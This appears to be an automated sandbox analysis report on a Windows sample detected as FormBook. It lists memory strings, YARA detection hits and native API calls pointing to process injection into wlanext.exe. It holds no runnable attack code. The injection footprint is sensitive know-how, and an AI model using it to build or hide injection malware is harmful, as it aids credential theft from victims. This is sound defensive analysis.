Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_00404EBC GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_004181D0 NtCreateFile,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00418280 NtReadFile,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00418300 NtClose,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_004183B0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_004181CA NtCreateFile,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041827A NtReadFile,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_004182FA NtClose,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA95D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA98A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9820 NtEnumerateKey,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AAB040 NtSuspendThread,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA99D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9950 NtQueueApcThread,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9A10 NtQuerySection,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AAA3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9B00 NtSetValueKey,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA95F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AAAD30 NtSetContextThread,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9560 NtWriteFile,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA96D0 NtCreateKey,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9650 NtQueryValueKey,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AAA710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9760 NtOpenProcess,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AA9770 NtSetInformationFile,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00AAA770 NtOpenThread,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_004181D0 NtCreateFile,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_00418280 NtReadFile,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_00418300 NtClose,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_004183B0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_004181CA NtCreateFile,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041827A NtReadFile,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_004182FA NtClose,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030CA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9A10 NtQuerySection,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030CB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030CA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030CA770 NtOpenThread,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030CAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C9560 NtWriteFile,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030C95F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_008681D0 NtCreateFile,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00868280 NtReadFile,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_008683B0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00868300 NtClose,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_008681CA NtCreateFile,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_008682FA NtClose,
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086827A NtReadFile,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_004046C3
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_004060D9
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_004068B0
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041B869
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041C07B
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041C804
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00401030
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00401174
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041B985
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041CB98
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00408C6B
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00408C70
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00408C2B
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041B4B3
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041C58E
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00402D90
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041BE99
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041CF43
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041CF0C
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041BFD4
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_0041CFA2
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00402FB0
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A920A0
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B320A8
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7B090
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B21002
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A84120
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A6F900
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A9EBB0
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7841F
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A92581
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A7D5E0
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A60D20
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00B31D55
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_2_00A86E30
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041B869
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041C07B
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041C804
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_00401030
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_00401174
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041B985
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 3_1_0041CB98
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03152B28
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030BEBB0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0314DBD2
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_031403DA
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_031522AE
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0308F900
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030A4120
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03141002
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0315E824
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0309B090
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030B20A0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_031520A8
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_031528EC
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0315DFCE
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03151FF1
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0314D616
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030A6E30
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03152EF7
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03152D07
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03080D20
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_03151D55
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_030B2581
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_031525DD
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0309D5E0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0309841F
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0314D466
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086C804
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086CB98
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00858C2B
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00858C6B
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00858C70
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086C58E
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00852D90
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086CFA0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_00852FB0
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 9_2_0086CF0C
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: String function: 0308B150 appears 45 times
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: String function: 0041A0B0 appears 52 times
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: String function: 00A6B150 appears 35 times
Source: eQLPRPErea.exe, 00000001.00000003.699812491.000000001EE2F000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs eQLPRPErea.exe
Source: eQLPRPErea.exe, 00000003.00000002.736314312.0000000000B5F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs eQLPRPErea.exe
Source: eQLPRPErea.exe, 00000003.00000002.736957220.00000000026C2000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamewlanext.exej% vs eQLPRPErea.exe
Source: eQLPRPErea.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
